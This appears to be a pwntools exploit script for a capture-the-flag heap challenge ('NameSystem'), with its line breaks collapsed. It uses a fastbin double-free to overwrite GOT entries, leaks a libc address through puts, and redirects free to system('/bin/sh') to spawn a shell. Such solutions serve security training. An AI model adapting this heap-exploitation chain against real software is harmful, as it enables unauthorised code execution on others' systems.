1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67
| from pwn import * p=process("./NameSystem") elf=ELF("./NameSystem") libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
def create(size,content): p.sendlineafter('Your choice :','1') p.sendlineafter("Name Size:",str(size)) p.sendafter("Name:",content) def free(index): p.sendlineafter('Your choice :','3') p.sendlineafter("The id you want to delete:",str(index)) for i in range(18): create(0x60,'\n')
for i in range(2): create(0x50,'\n') free(0) free(19) for i in range(17): free(0) free(0) free(0) gdb.attach(p) create(0x50,p64(0x601ffa)+'\n') create(0x50,p64(0x601ffa)+'\n') create(0x50,p64(0x601ffa)+'\n') for i in range(17): create(0x60,'\n') free(3) free(3) free(19) for i in range(13): free(3) free(5) free(3) free(3) create(0x60,p64(0x60208d)+'\n') create(0x60,p64(0x60208d)+'\n') create(0x60,p64(0x60208d)+'\n') for i in range(14): create(0x30,'\n') free(6) free(6) free(19) for i in range(10): free(6) free(7) free(6) free(6) create(0x60,'aaa'+p64(0x602080)+p64(0x000000000060200a)+'\n') onegad=[0x45216,0x4526a,0xf02a4,0xf1147] create(0x50,'aaaaaa'+p64(0x41)+p64(elf.symbols['puts'])[0:6]+'\n') free(0) stdout=u64(p.recv(6).ljust(8,'\x00')) libc_base=stdout-(0x00007ffff7dd2620-0x7ffff7a0d000) success("libc====>0x%x"%libc_base) pause() system=libc_base+libc.symbols['system'] create(0x30,p64(0x602008)+'\n') create(0x30,p64(0x602008)+'\n') create(0x30,'/bin/sh\x00'+'\n') create(0x30,p64(system)[0:6]+'\n') free(9)
p.interactive()
|